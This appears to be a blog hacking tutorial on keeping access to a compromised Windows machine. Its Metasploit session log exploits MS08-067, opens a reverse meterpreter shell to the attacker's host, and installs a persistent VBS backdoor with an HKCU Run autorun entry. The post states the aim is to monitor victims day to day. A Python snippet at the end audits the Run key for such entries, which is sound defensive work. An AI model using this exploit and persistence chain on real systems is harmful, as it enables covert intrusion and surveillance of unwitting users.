Gaining access to meterpreter has been explained before, such as here, here, and here. Many users are genuinely sharp and can spot what is wrong with their computers, so they close the security holes (vulnerabilities), and the hacker will find it hard to get in again with the same method as before.
Why does access have to be maintained? It is done to monitor the victim day to day and to study whatever the hacker is after.
By doing this, the hacker can still get in even though the way in is not the same as before. Meterpreter provides a dedicated script for this, which lets us interact with the registry.
Right away, then: once inside meterpreter, run the following module:
[code]
root@bt5r1:~# cd /opt/framework/msf3/
root@bt5r1:/opt/framework/msf3# ./msfconsole
######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
## ### #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
=[ metasploit v4.1.0-testing [core:4.1 api:1.0]
+ -- --=[ 747 exploits - 383 auxiliary - 92 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
=[ svn r13985 updated 5 days ago (2011.10.18)
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 172.16.129.1
LHOST => 172.16.129.1
msf exploit(ms08_067_netapi) > set RHOST 172.16.129.128
RHOST => 172.16.129.128
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 172.16.129.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 172.16.129.128
[*] Meterpreter session 1 opened (172.16.129.1:4444 -> 172.16.129.128:1235) at 2011-10-23 12:42:13 +0700
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching multi/handler to connect to the agent
-L Location in target host where to write payload to, if none %TEMP% will be used.
-P Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i The interval in seconds between each connection attempt
-p The port on the remote host where Metasploit is listening
-r The IP of the system running Metasploit listening for the connect back
meterpreter > run persistence -U -i 5 -p 443 -r 172.16.129.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/ROOT-08DA1D7B75_20111023.4439/ROOT-08DA1D7B75_20111023.4439.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=172.16.129.1 LPORT=443
[*] Persistent agent script is 609731 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\zNIGCZocmGcl.vbs
[*] Executing script C:\WINDOWS\TEMP\zNIGCZocmGcl.vbs
[+] Agent executed with PID 3952
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ZRXNwNBmgYB
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ZRXNwNBmgYB
meterpreter > reboot
Rebooting...
meterpreter > exit
[*] Shutting down Meterpreter...
[*] Meterpreter session 1 closed. Reason: User exit
msf exploit(ms08_067_netapi) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.129.1
LHOST => 172.16.129.1
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Started reverse handler on 172.16.129.1:443
[*] Starting the payload handler...
After the user logs in
[*] Sending stage (748544 bytes) to 192.168.1.161
[*] Meterpreter session 2 opened (172.16.129.1:443 -> 172.16.129.128:1235) at 2011-10-23 12:47:13 -0600
meterpreter >
[/CODE]
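The session log above reports exactly what the script leaves behind: a value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run whose data is a .vbs file in C:\WINDOWS\TEMP. The following is an added example, not part of the original post: Python that parses `reg query` output for the Run key and flags values that launch a script file or point into a temp directory. The sample input is constructed, and the function and pattern names are this example's own.

```python
import re
from typing import NamedTuple

# Constructed sample of `reg query` output; the last value mirrors the
# autorun entry reported in the session log above.
SAMPLE = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    Sync Tool    REG_SZ    "C:\Program Files\Sync\sync.exe" /background
    ZRXNwNBmgYB    REG_SZ    C:\WINDOWS\TEMP\zNIGCZocmGcl.vbs
"""

VALUE_RE = re.compile(r"^\s+(?P<name>.+?)\s+(?P<type>REG_[A-Z_]+)\s+(?P<data>.*)$")
SCRIPT_RE = re.compile(r"\.(vbs|vbe|js|jse|wsf|bat|cmd|ps1)\b", re.I)
TEMP_RE = re.compile(r"\\(temp|tmp)\\|%te?mp%", re.I)


class Finding(NamedTuple):
    key: str
    name: str
    data: str
    reasons: tuple


def audit_run_values(reg_query_output: str) -> list:
    """Return autorun values that launch a script or live in a temp directory."""
    findings, key = [], ""
    for line in reg_query_output.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()  # header line naming the current key
            continue
        m = VALUE_RE.match(line)
        if not m or not key.lower().endswith(r"\currentversion\run"):
            continue
        data = m["data"]
        reasons = []
        if SCRIPT_RE.search(data):
            reasons.append("script file")
        if TEMP_RE.search(data):
            reasons.append("temp directory")
        if reasons:
            findings.append(Finding(key, m["name"], data, tuple(reasons)))
    return findings


if __name__ == "__main__":
    for f in audit_run_values(SAMPLE):
        print(f"{f.key}\\{f.name} -> {f.data} [{', '.join(f.reasons)}]")
```

A value that trips both reasons, as the one in the log does, deserves a look at the referenced file and at the process it started.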
Good luck trying it out . . :D
Source: In Here